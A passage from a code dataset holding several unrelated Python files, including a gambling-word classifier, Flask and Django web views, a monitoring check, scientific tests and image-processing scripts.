inverse_operation=torch.ones([10,1],dtype=torch.float, device=device)\r\n _y1=torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n loss_label = abs(pred3-abs(_y1-inverse_operation))\r\n #print(loss_label.shape)\r\n #train_temp = random.choice(unlab_set)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n #features2 = torch.tensor(list(train_temp), \r\n # dtype=torch.float, device=device).unsqueeze(0).unsqueeze(0)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n #label2 = self.model1(features2)\r\n #\r\n# =============================================================================\r\n# optimizer_judge.zero_grad()\r\n# loss_label.backward()\r\n# optimizer_judge.step()\r\n# =============================================================================\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n features4 = torch.tensor(train_temp2, \r\n dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label4=torch.round(torch.sigmoid(self.model1(features4)))\r\n #label4 = torch.tensor(fake_label, dtype=torch.float, device=device)\r\n #pred4 = self.model1(features4)\r\n #prob_unlabel_istrue_temp=torch.sigmoid(self.model2(features2,_y2)).cpu().detach().numpy().tolist()\r\n #prob_unlabel_istrue=torch.tensor(prob_unlabel_istrue_temp, dtype=torch.float, device=device)\r\n #print(pred4.shape)\r\n #print(label4.shape)\r\n #loss_unlabel_temp = prob_unlabel_istrue\r\n #print(loss_unlabel_temp.shape)\r\n #print(loss_unlabel_temp.shape)\r\n #print(prob_unlabel_istrue.shape)\r\n loss_unlabel=torch.sigmoid(self.model2(features4,label4))\r\n #print(loss_unlabel.shape)\r\n #print(loss_label.shape)\r\n loss_total = 1-(torch.cat((loss_label,loss_unlabel),0)-0.5)\r\n #loss_total = loss_label+loss_unlabel\r\n #print(loss_total)\r\n \r\n \r\n # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n #loss_judge = loss_func_judge(pred, label)\r\n loss_total.mean().backward()\r\n #total_loss2 += loss_total.mean()\r\n reward+=loss_total.mean()\r\n optimizer.step()\r\n #reward+=loss_total.mean()\r\n if epoch%5==0:\r\n print(\"Judger: in epoch {} loss {}\".format(epoch, total_loss1/1000.0))\r\n print(\"Classfier: in epoch {} reward {}\".format(epoch, reward/1000))\r\n if epoch%30==0:\r\n self.evaluate(elv)\r\n #print(loss_total)\r\n scheduler_policy_gradient.step(reward/1000)\r\n scheduler_judge.step(total_loss1/1000)\r\n def evaluate(self, test_set):\r\n with torch.no_grad(): # 评估时不进行梯度计算\r\n features = torch.tensor(test_set[:,:-1], dtype=torch.float, device=device).unsqueeze(1)\r\n final_prediction = self.model1(features)\r\n final_pred_np = final_prediction.cpu().detach().numpy()\r\n temp=final_pred_np.squeeze()\r\n #temp[np.where(temp>=0.5)]=1\r\n #temp[np.where(temp<0.5)]=0\r\n print('Evaluating: test accuracy is {}'.format(roc_auc_score(test_set[:,-1],temp )))\r\n\r\n #print('Evaluating: test accuracy is {}%'.format(correct*100/np.size(test_set,0)))\r\n return np.corrcoef(final_pred_np.squeeze(), test_set[:,-1])[0]\r\n \r\n def predict(self, name,word):\r\n #p = name2vec(name.lower())\r\n name_tensor = torch.tensor(name, dtype=torch.float, device=device).unsqueeze(0).unsqueeze(0)\r\n with torch.no_grad():\r\n out = self.model1(name_tensor)\r\n out = torch.argmax(out).item()\r\n sexy = 'gamble' if out == 0 else 'no-gamble'\r\n print('{} is {}'.format(word, sexy))\r\n\r\n\r\n \r\ndef main(args):\r\n\r\n\r\n\r\n model5=Model(args)\r\n training_data1=np.concatenate((X1,np.expand_dims(Y1, axis=1)),axis=1)\r\n training_data2=np.concatenate((X2,np.expand_dims(Y2, axis=1)),axis=1)\r\n model5.train(training_data1,X3,training_data2,args)\r\n #grid_search_40_2000.append(model5.evaluate(training_date2))\r\n \r\n #print(model5.model1(torch.tensor(X3[1], dtype=torch.float, device=device)))\r\n torch.save(model5, './adv_learning_model.pkl')\r\n predict_result=torch.zeros(len(X3),1,dtype=torch.float32)\r\n with torch.no_grad():\r\n for i in range(int(len(X3)/100)+1):\r\n predict_result[i*100:min((i+1)*100,len(X3))]=model5.model1(torch.tensor(X3[i*100:min((i+1)*100,len(X3)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n return predict_result\r\n # =============================================================================\r\n # model5.train(training_data1,pretrain=True)\r\n # #grid_search_40_2000.append(model5.evaluate(training_date2))\r\n # \r\n # print(model5.model(torch.tensor(X3[1], dtype=torch.float, device=device).unsqueeze(0).unsqueeze(0)))\r\n # model5.evaluate(training_data1)\r\n # =============================================================================\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import roc_auc_score\r\n#from sklearn.metrics import score\r\nimport pickle\r\nif __name__ == \"__main__\":\r\n X1, Y1,X2,Y2,X3,Z1 = get_data(0.01) \r\n \r\n\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--c\", type=float, default=0.01)\r\n parser.add_argument(\"--lr\", type=float, default=0.001)\r\n parser.add_argument(\"--batchsize\", type=int, default=1)\r\n parser.add_argument(\"--epoch\", type=int, default=200)\r\n parser.add_argument(\"--input_size\", type=int, default=768)\r\n parser.add_argument(\"--output_size\", type=int, default=1)\r\n parser.add_argument(\"--patience\", type=int, default=4)\r\n parser.add_argument(\"--threshold\", type=int, default=0.00001)\r\n parser.add_argument(\"--cooldown\", type=int, default=0)\r\n parser.add_argument(\"--num_of_layer\", type=int, default=3)\r\n parser.add_argument(\"--juger_type\", type=int, default=2)\r\n args = parser.parse_args()\r\n\r\n \r\n\r\n args.patience=3\r\n #args.threshold=0.0001\r\n args.cooldown=2\r\n args.num_of_layer=3\r\n #pred_adv=main(args)\r\n model5=Model(args)\r\n training_data1=np.concatenate((X1,np.expand_dims(Y1, axis=1)),axis=1)\r\n training_data2=np.concatenate((X2,np.expand_dims(Y2, axis=1)),axis=1)\r\n model5.train(training_data1,X3,training_data2,args)\r\n #grid_search_40_2000.append(model5.evaluate(training_date2))\r\n \r\n #print(model5.model1(torch.tensor(X3[1], dtype=torch.float, device=device)))\r\n torch.save(model5, './adv_learning_model.pkl')\r\n with open('../nlp/gamble_new_candidate_words.pickle', \"rb\") as input_file:\r\n word_index = pickle.load(input_file)\r\n idxs_index=[]\r\n idxs_words=[]\r\n for key in word_index:\r\n if key in Z1:\r\n idxs_index.append(np.where(Z1==key)[0][0])\r\n idxs_words.append(key)\r\n current_input=X3[idxs_index,:]\r\n predict_result=torch.zeros(len(current_input),1,dtype=torch.float32)\r\n with torch.no_grad():\r\n for i in range(int(len(current_input)/100)+1):\r\n predict_result[i*100:min((i+1)*100,len(current_input))]=model5.model1(torch.tensor(current_input[i*100:min((i+1)*100,len(current_input)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n\r\n pred_adv_np=predict_result.cpu().detach().numpy()\r\n sort_of_adv=sorted(range(len(pred_adv_np)), key=lambda k: -pred_adv_np[k])\r\n output_adv=np.array(idxs_words)[sort_of_adv[:500]]\r\n \r\n with open('../nlp/wahaha_words.pickle', \"rb\") as input_file:\r\n word_index = pickle.load(input_file)\r\n idxs_index=[]\r\n idxs_words=[]\r\n for key in word_index:\r\n if key in Z1:\r\n idxs_index.append(np.where(Z1==key)[0][0])\r\n idxs_words.append(key)\r\n current_input=X3[idxs_index,:]\r\n predict_result2=torch.zeros(len(current_input),1,dtype=torch.float32)\r\n with torch.no_grad():\r\n for i in range(int(len(current_input)/100)+1):\r\n predict_result2[i*100:min((i+1)*100,len(current_input))]=model5.model1(torch.tensor(current_input[i*100:min((i+1)*100,len(current_input)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n\r\n pred_adv_np2=predict_result2.cpu().detach().numpy()\r\n sort_of_adv2=sorted(range(len(pred_adv_np2)), key=lambda k: -pred_adv_np2[k])\r\n output_adv2=np.array(idxs_words)[sort_of_adv2[:500]]\r\n# =============================================================================\r\n import re\r\n def is_good(w):\r\n if re.findall(u'[\\u4e00-\\u9fa5]', w) \\\r\n and len(w) >= 2\\\r\n and not re.findall(u'[较很越增]|[多少大小长短高低好差]', w)\\\r\n and not (u'代上级' in w or u'唔知' in w or u'唔该' in w or u'曾经' in w or u'施主' in w or u'为何' in w or u'风流' in w or u'招聘' in w or u'夏令营' in w or u'继续' in w or u'跆拳道' in w or u'西红柿' in w or u'满群' in w or u'汽油' in w or u'处理' in w or u'霸王餐' in w or u'帅哥美女' in w or u'兄弟姐妹' in w or u'党费' in w or u'资料费' in w or u'电费' in w or u'生活费' in w or u'车费' in w or u'气费' in w or u'报名费' in w or u'出现' in w or u'有求' in w or u'情谊' in w or u'永不' in w or u'坚决' in w)\\\r\n and not w[-1] in u'们啦我你他投图机抢的送班购了吗群轮店货日啊好的个是国春爱哟哦'\\\r\n and not w[:1] in [u'求',u'情',u'杨',u'心',u'昨',u'那',u'赚',u'给',u'这',u'收',u'今',u'送',u'的',u'祝',u'每',u'不',u'有',u'你',u'我',u'他',u'她',u'它']\\\r\n and not w[:3] in [u'朋友圈']\\\r\n and not w[-2:] in [u'开始',u'返现',u'新人',u'求助',u'完成',u'烦躁',u'守候',u'基金',u'志明',u'春娇',u'殿明',u'兑现',u'不起']\\\r\n and not w[2:] in [u'发起',u'圆满',u'推荐',u'慈善',u'美好',u'冻结']\\\r\n and not w[-3:] in [u'倒计时',u'玻尿酸',u'睫毛膏',u'精华液']:\r\n return True\r\n else:\r\n return False\r\n# \r\n import AhoCorasickTree as ACT \r\n def build_ac_tree(pattern_word_list):\r\n \r\n ac = ACT.ACTree()\r\n ac.build(pattern_word_list)\r\n \r\n return ac\r\n# \r\n fields=['key'] \r\n df_city = pd.read_csv('./data/citylist.csv',encoding='utf-8', usecols=fields)\r\n city_list=np.squeeze(np.array(df_city.values.tolist())).tolist()\r\n AC_Tree_City=build_ac_tree(city_list)\r\n def is_not_city(w):\r\n match_res = AC_Tree_City.match(w)\r\n words_set=set(match_res)\r\n if not words_set:\r\n return True\r\n else:\r\n return False\r\n import codecs\r\n name_list = codecs.open('./data/Chinese_Names_120W.txt', 'r', 'utf-8').read().split()\r\n chengyu_list = codecs.open('./data/ChengYu_5W.txt', 'r', 'utf-8').read().split()\r\n relationship_list = codecs.open('./data/Chinese_Relationship.txt', 'r', 'utf-8').read().split()\r\n \r\n \r\n AC_Tree_name_chengyu=build_ac_tree(name_list+chengyu_list+relationship_list)\r\n def is_not_name_or_chengyu(w):\r\n match_res = AC_Tree_name_chengyu.match(w)\r\n words_set=set(match_res)\r\n if not words_set:\r\n return True\r\n else:\r\n return False\r\n# =============================================================================\r\n output_version='1120'\r\n word_output_adv_clear=[i for i in output_adv if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n pd.DataFrame(np.array(word_output_adv_clear).reshape((len(word_output_adv_clear),1))).to_csv('york_gamble_newwords'+output_version+'_adv.csv',encoding='utf-8-sig')\r\n \r\n \r\n clf = svm.SVC(gamma='scale',probability=True, kernel = 'linear')\r\n clf.fit(X1, Y1)\r\n y_pred_svm=clf.predict(current_input)\r\n sort_of_svm=sorted(range(len(y_pred_svm)), key=lambda k: -y_pred_svm[k])\r\n output_svm=np.array(idxs_words)[sort_of_svm[0:500]]\r\n word_output_svm_clear=[i for i in output_svm if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n pd.DataFrame(np.array(word_output_svm_clear).reshape((len(word_output_svm_clear),1))).to_csv('york_gamble_newwords'+output_version+'_svm.csv',encoding='utf-8-sig')\r\n \r\n \r\n from sklearn.neural_network import MLPClassifier\r\n clf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n hidden_layer_sizes=(global_input_size, global_input_size), random_state=1)\r\n clf.fit(X1, Y1) \r\n y_pred_mlp=clf.predict(current_input)\r\n sort_of_mlp=sorted(range(len(y_pred_mlp)), key=lambda k: -y_pred_mlp[k])\r\n output_mlp=np.array(idxs_words)[sort_of_mlp[0:500]]\r\n word_output_mlp_clear=[i for i in output_mlp if is_good(i) and is_not_city(i) and is_not_name_or_chengyu(i)]\r\n pd.DataFrame(np.array(word_output_mlp_clear).reshape((len(word_output_mlp_clear),1))).to_csv('york_gamble_newwords'+output_version+'_mlp.csv',encoding='utf-8-sig')\r\n ","sub_path":"pytorch_cnn_adv_training_20191120_word2vec.py","file_name":"pytorch_cnn_adv_training_20191120_word2vec.py","file_ext":"py","file_size_in_byte":44282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75593416","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom Algorithm.earliest_algorithm_MYSQLver import run_the_algorithm\nimport mysql.connector\n\napp = Flask(__name__)\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n return redirect(url_for('search_result', start=request.form['start'], goal=request.form['goal']))\n return render_template('index.html')\n\n@app.route('/result?start=&goal=')\ndef search_result(start, goal):\n result = run_the_algorithm(start, goal)\n return render_template('search_result.html', result=result)\n\n\n@app.template_filter('remove_second')\ndef remove_second_from_time(time):\n time = time.split(':')\n new_time = time[0] + ':' + time[1]\n return new_time\n\n@app.template_filter('decode_station_name')\ndef decode_station_name(station):\n for x in data:\n if station in x:\n return x[0]\n\n@app.template_filter('decode_train_class')\ndef decode_train_class(train_class):\n Limited_Express = [1100, 1101, 1103, 1108]\n Tarko = 1102\n Puyuma = 1107\n Express = [1110, 1111, 1114, 1115]\n Rapid = [1120]\n Local = [1131, 1132, 1140]\n\n train=None\n if train_class in Limited_Express:\n train = '自強號'\n elif train_class == Tarko:\n train = '太魯閣號'\n elif train_class == Puyuma:\n train = '普悠瑪號'\n elif train_class in Express:\n train = '莒光號'\n elif train_class in Rapid:\n train = '復興號'\n elif train_class in Local:\n train = '區間車'\n return train\n\n\nif __name__ == \"__main__\":\n app.debug = True\n conn = mysql.connector.connect(user='root',\n password='testpassword',\n host='127.0.0.1',\n database='test')\n cur = conn.cursor(buffered=True)\n cur.execute('SELECT station, station_code FROM train_station_info;')\n data = cur.fetchall()\n cur.close()\n conn.close()\n app.run()","sub_path":"Transport navigation Website/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184702718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# (c) 2018, René Moser \n\n\nfrom __future__ import print_function\n\nimport sys\nimport argparse\nimport requests\nimport json\n\nrequests.packages.urllib3.disable_warnings()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--protocol', default='https', help='Protocol to be used, default https')\n parser.add_argument('--port', type=int, default=443, help='Port used, default 443')\n parser.add_argument('--host', default=\"localhost\", help='Host, default localhost')\n parser.add_argument('--username', help='Icinga2 username')\n parser.add_argument('--password', default=\"\", help='Icinga2 password')\n\n args = parser.parse_args()\n\n headers = {\n 'Accept': 'application/json',\n 'X-HTTP-Method-Override': 'GET',\n }\n url = \"%s://%s:%s/v1/objects/services\" % (args.protocol, args.host, args.port)\n\n data = {\n 'joins': ['host.name'],\n 'filter': 'match(\"CloudStack Router Rebooted Unconfigured\", service.name)'\n }\n\n resp = requests.post(url, headers=headers, auth=(args.username, args.password), data=json.dumps(data), verify=False)\n\n routers_list = []\n routers_in_error_state_list = []\n\n if resp.status_code == 200:\n for result in resp.json().get('results') or []:\n host_name = result.get('attrs').get('host_name')\n routers_list.append(host_name)\n if result.get('attrs').get('last_hard_state') == 2:\n routers_in_error_state_list.append(host_name)\n else:\n print(\"UNKNOWN: URL %s returned %s\" % (url, resp.status_code))\n sys.exit(3)\n\n count_results = len(routers_list)\n error_count_results = len(routers_in_error_state_list)\n\n if len(routers_in_error_state_list) > 0:\n print(\"ERROR: %s of %s routers unhealthy: %s\" % (error_count_results, count_results, ', '.join(routers_in_error_state_list)))\n sys.exit(2)\n\n if not count_results:\n print(\"WARNING: no results, filter?\")\n sys.exit(1)\n\n print(\"OK: %s routers healthy\" % count_results)\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n print(\"UNKNOWN: %s\" % str(e))\n sys.exit(3)\n","sub_path":"check_any_routers_unconfigured.py","file_name":"check_any_routers_unconfigured.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"339945035","text":"import pytest\nimport numpy as np\n\n# from sklearn.utils import assert_array_equal\n# from sklearn.utils import assert_allclose\n\nfrom GLE_analysisEM import GLE_Estimator, GLE_BasisTransform, sufficient_stats, sufficient_stats_hidden, preprocessingTraj\nfrom ..utils import loadTestDatas_est, generateRandomDefPosMat\n\n\n@pytest.fixture\ndef data():\n return [\"GLE_analysisEM/tests/0_trajectories.dat\"]\n\n\ndef test_gen_random_mat():\n A = generateRandomDefPosMat()\n assert np.all(np.linalg.eigvals(A + A.T) > 0)\n\n\n# def test_basis_proj(data):\n# transform = GLE_BasisTransform(dim_x=1)\n#\n#\n# def test_user_input(data):\n# est = GLE_Estimator(init_params=\"user\")\n#\n#\n# def test_markov_input(data):\n# est = GLE_Estimator(init_params=\"markov\")\n#\n\n\ndef test_m_step_aboba(data):\n est = GLE_Estimator()\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.dt = X[1, 0] - X[0, 0]\n est._check_n_features(X)\n est._check_initial_parameters()\n Xproc, idx = preprocessingTraj(X, idx_trajs=idx, dim_x=est.dim_x)\n traj_list = np.split(Xproc, idx)\n traj_list_h = np.split(Xh, idx)\n\n datas = 0.0\n for n, traj in enumerate(traj_list):\n datas_visible = sufficient_stats(traj, est.dim_x)\n zero_sig = np.zeros((len(traj), 2 * est.dim_h, 2 * est.dim_h))\n muh = np.hstack((np.roll(traj_list_h[n], -1, axis=0), traj_list_h[n]))\n datas += sufficient_stats_hidden(muh, zero_sig, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force) / len(traj_list)\n est._initialize_parameters(datas_visible / len(traj_list), np.random.default_rng())\n logL1, _ = est.loglikelihood(datas)\n est._m_step(datas)\n logL2, _ = est.loglikelihood(datas)\n assert logL2 > logL1\n\n\ndef test_e_step_aboba(data):\n\n est = GLE_Estimator(C_init=np.identity(2), A_init=np.array([[5, 1.0], [-2.0, 0.07]]), force_init=np.array([-1]), init_params=\"user\")\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.dt = X[1, 0] - X[0, 0]\n est._check_n_features(X)\n est._check_initial_parameters()\n Xproc, idx = preprocessingTraj(X, idx_trajs=idx, dim_x=est.dim_x)\n traj_list = np.split(Xproc, idx)\n traj_list_h = np.split(Xh, idx)\n datas = 0.0\n for n, traj in enumerate(traj_list):\n datas_visible = sufficient_stats(traj, est.dim_x)\n zero_sig = np.zeros((len(traj), 2 * est.dim_h, 2 * est.dim_h))\n muh = np.hstack((np.roll(traj_list_h[n], -1, axis=0), traj_list_h[n]))\n datas += sufficient_stats_hidden(muh, zero_sig, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force) / len(traj_list)\n est._initialize_parameters(datas_visible / len(traj_list), np.random.default_rng())\n\n muh, Sigh = est._e_step(traj) # Compute hidden variable distribution\n new_stat = sufficient_stats_hidden(muh, Sigh, traj, datas_visible, est.dim_x, est.dim_h, est.dim_coeffs_force)\n # assert close new_stat, datas\n # assert_array_equal(y_pred, np.ones(X.shape[0], dtype=np.int64))\n\n\ndef test_em_estimator(data):\n est = GLE_Estimator(verbose=1, C_init=np.identity(2))\n X, idx, Xh = loadTestDatas_est(data, 1, 1)\n basis = GLE_BasisTransform()\n X = basis.fit_transform(X)\n est.fit(X)\n assert est.dt == 5e-3\n assert hasattr(est, \"converged_\")\n\n # X = data[0]\n # assert_array_equal(y_pred, np.ones(X.shape[0], dtype=np.int64))\n","sub_path":"GLE_analysisEM/tests/test_estimator.py","file_name":"test_estimator.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"463500110","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import CommentSerializers, CommunitySerializers\nfrom .models import Comment, Community\n\n\nclass CommunityView(APIView):\n # POST /community\n def post(self, request):\n community_serializers = CommunitySerializers(data=request.data)\n if community_serializers.is_valid():\n community_serializers.save()\n return Response(community_serializers.data, status=status.HTTP_201_CREATED)\n else:\n return Response(community_serializers.data, status=status.HTTP_400_BAD_REQUEST)\n # GET /comumnity\n # GET /community/{community_id}\n def get(self, request, **kwargs):\n if kwargs.get('id') is None:\n community_queryset = Community.objects.all()\n community_queryset_serializer = CommunitySerializers(community_queryset, many=True)\n return Response(community_queryset_serializer.data, status=status.HTTP_200_OK)\n else:\n id = kwargs.get('id')\n community_serializer = CommunitySerializers(Community,objects.get(id=id))\n return Response(community_serializer.data, status=status.HTTP_200_OK)\n \n # PUT /community/{community_id}\n def put(self, request, **kwargs):\n if kwargs.get('id') is None:\n return Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n else:\n id = kwargs.get('id')\n community_object = Community.objects.get(id=id)\n\n update_community_serializer = CommunitySerializers(community_object,data=request.data)\n if update_community_serializer.is_valid():\n update_community_serializer.save()\n return Response(update_community_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n \n # DELETE /community/{community_id}\n def delete(self, request, **kwargs):\n if kwargs.get('id') is None:\n return Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n else:\n id = kwargs.get('id')\n community_object = Community.objects.get(id=id)\n community_object.delete()\n return Response(\"deleted\", status=status.HTTP_200_OK)\n\nclass CommentView(APIView):\n # POST /community/comment\n def post(self, request, **kwargs):\n comment_serializer = CommentSerializers(data=request.data)\n if comment_serializer.is_valid():\n comment_serializer.save()\n return Response(comment_serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(comment_serializer.error, status=status.HTTP_400_BAD_REQUEST)\n\n # GET /community/comment\n # GET /community/comment/{comment_id}\n def get(self, request, **kwargs):\n if kwargs.get('id') is None:\n comment_queryset = Comment.objects.all()\n comment_queryset_serializer = CommentSerializers(comment_queryset, many=True)\n return Response(comment_queryset_serializer.data, status=status.HTTP_200_OK)\n else:\n id = kwargs.get('id')\n comment_serializer = CommentSerializers(Comment.objects.get(id=id))\n return Response(comment_serializer.data, status=status.HTTP_200_OK)\n\n # PUT /community/comment/{comment_id}\n def put(self, request, **kwargs):\n if kwargs.get('id') is None:\n return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n else:\n id = kwargs.get('id')\n comment_object = Comment.objects.get(id=id)\n\n update_comment_serializer = CommentSerializers(comment_object, data=request.data)\n if update_comment_serializer.is_valid():\n update_comment_serializer.save()\n return Response(update_comment_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(\"invalid request\", status=status.HTTP_400_BAD_REQUEST)\n\n # DELETE /community/comment/{comment_id}\n def delete(self, request, **kwargs):\n if kwargs.get('id') is None:\n return Response('invalid request', status=status.HTTP_400_BAD_REQUEST)\n else:\n id = kwargs.get('id')\n comment_object = Comment.objects.get(id=id)\n comment_object.delete()\n return Response(\"deleted\", status=status.HTTP_200_OK)","sub_path":"backend/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"449392405","text":"#!/home/cc8dm/miniconda3/bin/python\n\nimport sys\nimport subprocess\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-t','--threads',default=\"1\")\nparser.add_argument('-d','--database')\nparser.add_argument('-f','--filename')\nparser.add_argument('-s','--sample_id')\n\nargs = parser.parse_args()\n\noutfile = args.sample_id+\".mash_dist.out\"\nerrfile = args.sample_id+\".mash_dist.err\"\n\nthreshold_list = [0.0,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0]\nthreshold_index = 0\n\n#Continue through while loop if the file doesn't exist or if Mash doesn't output with the current threshold\nwhile not os.path.isfile(outfile) or os.path.getsize(outfile) == 0 and os.path.getsize(errfile) == 0:\n mash_threshold = threshold_list[threshold_index]\n print(str(mash_threshold))\n command = \"mash dist -d \" + str(mash_threshold) + \" -p \" + args.threads + \" \" + args.database + \" \" + args.filename \n\n with open(outfile,\"w\") as out, open(errfile,\"w\") as err:\n process = subprocess.Popen(command,shell=True,stdout=out,stderr=err)\n process.wait()\n\n if os.path.getsize(outfile) == 0:\n threshold_index = threshold_index + 1\n","sub_path":"IVV_Pipeline/MetagenomicPipeline/Run_MashDist.py","file_name":"Run_MashDist.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"235383628","text":"from flask import Blueprint, request, render_template, redirect, url_for, flash\nfrom models.users.views import token_required\nfrom models.questions.questions import Question\n\nquestion_blueprint = Blueprint('question_view', __name__)\n\n\n@question_blueprint.route('/questions', methods=['GET', 'POST'])\n@token_required\ndef questions(current_user):\n blank_title = \"\"\n blank_question = \"\"\n if request.method == 'POST':\n title = request.form['title']\n asked_question = request.form['asked_question']\n\n if title == blank_title or asked_question == blank_question:\n if title == \"\":\n blank_title += \"This field is empty\"\n if asked_question == \"\":\n blank_question += \"This field is empty\"\n return render_template('question_view/create_question.html',\n title='New Question',\n current_user=current_user,\n blank_question=blank_question,\n blank_title=blank_title)\n\n if title == blank_title and asked_question == blank_question:\n blank_title += \"This field is empty\"\n blank_question += \"This field is empty\"\n return render_template('question_view/create_question.html',\n title='New Question',\n current_user=current_user,\n blank_question=blank_question,\n blank_title=blank_title)\n\n new_question = Question(user_id=current_user.public_id, title=title, question=asked_question)\n print(\"user_id\", new_question.user_id)\n print(\"time\" + new_question.question_timestamp)\n print(\"date\" + new_question.asked_date)\n print(\"title\" + new_question.question_title)\n print(\"text\" + new_question.question_text)\n new_question.save_to_db()\n flash('Your Question has been asked, wait for answers!', 'success')\n return redirect(url_for('users_view.profile'))\n\n return render_template('question_view/create_question.html',\n title='New Question',\n current_user=current_user,\n blank_question=blank_question,\n blank_title=blank_title)\n","sub_path":"models/questions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412384986","text":"import cv2\nimport numpy as np\n\nhog = cv2.HOGDescriptor()\n\ndef hoggify(a,b):\n\n data=[]\n labels=[]\n for i in range(a,int(b)):\n image = cv2.imread(\"./TrainImages/pos-\"+str(i)+\".pgm\", 0)\n dim = 128\n img = cv2.resize(image, (dim,dim), interpolation = cv2.INTER_AREA)\n img = hog.compute(img)\n img = np.squeeze(img)\n data.append(img)\n labels.append(np.int_(1))\n\n image = cv2.imread(\"./TrainImages/neg-\"+str(i)+\".pgm\", 0)\n dim = 128\n img = cv2.resize(image, (dim,dim), interpolation = cv2.INTER_AREA)\n img = hog.compute(img)\n img = np.squeeze(img)\n data.append(img)\n labels.append(np.int_(-1))\n\n return data, labels\n\ndef svmTrain(data,labels):\n svm=cv2.ml.SVM_create()\n svm.setKernel(cv2.ml.SVM_LINEAR)\n svm.setType(cv2.ml.SVM_NU_SVR)\n svm.setNu(0.5)\n svm.setC(0.01)\n svm.setP(0.5)\n svm.setDegree(0.1);\n svm.trainAuto(data, cv2.ml.ROW_SAMPLE,labels)\n return svm\n\ndef list_to_matrix(lst):\n return np.stack(lst)\n\nprint(hog.getDescriptorSize())\nlst, labels = hoggify(0,100)\ndata=list_to_matrix(lst)\n#print(data)\nlabels=np.int_(labels)\nmodel=svmTrain(data,labels)\nmodel.save(\"cars.xml\")\n\nlst, labels = hoggify(100,110)\ndata=list_to_matrix(lst)\ndata=np.float32(data)\nlab_out=model.predict(data)\n\nprint(lab_out)","sub_path":"HOGTrain.py","file_name":"HOGTrain.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"7036870","text":"import nipype.pipeline.engine as pe\nimport nipype.interfaces.utility as util\nimport nipype.interfaces.io as nio\nimport spynoza\nfrom spynoza.registration.sub_workflows import create_epi_to_T1_workflow\n\nderivatives_folder = '/data/derivatives/registration_tests/epi_to_T1w_epi'\n\ndef invert_image(input_image):\n import nibabel as nb\n import os\n from spynoza.utils import fname_presuffix\n \n image = nb.load(input_image)\n \n \n data = image.get_data()\n \n data = -data\n \n new_image = nb.Nifti1Image(data, image.affine, image.header)\n \n new_fn = spynoza.utils.fname_presuffix(input_image, suffix='_inv', newpath='.')\n new_image.to_filename(new_fn)\n \n return new_fn\n\nfor method in ['linear_hires', 'linear_precise', 'linear_hires_intramodal.original', 'linear_hires_intramodal.invert']:\n for run in [1,2,3,4, 5]:\n\n name = 'test_registration_method-%s_run-%s' % (method, run)\n\n parameter_file = '%s.json' % method.split('.')[0]\n source_file = '/data/derivatives/mean_epi/sub-012/func/sub-012_task-binoculardots055_run-{run}_bold_mean_ref.nii.gz'.format(**locals())\n \n \n wf = create_epi_to_T1_workflow(package='ants', \n parameter_file=parameter_file,\n apply_transform=True)\n \n wf.get_node('ants_registration').inputs.num_threads = 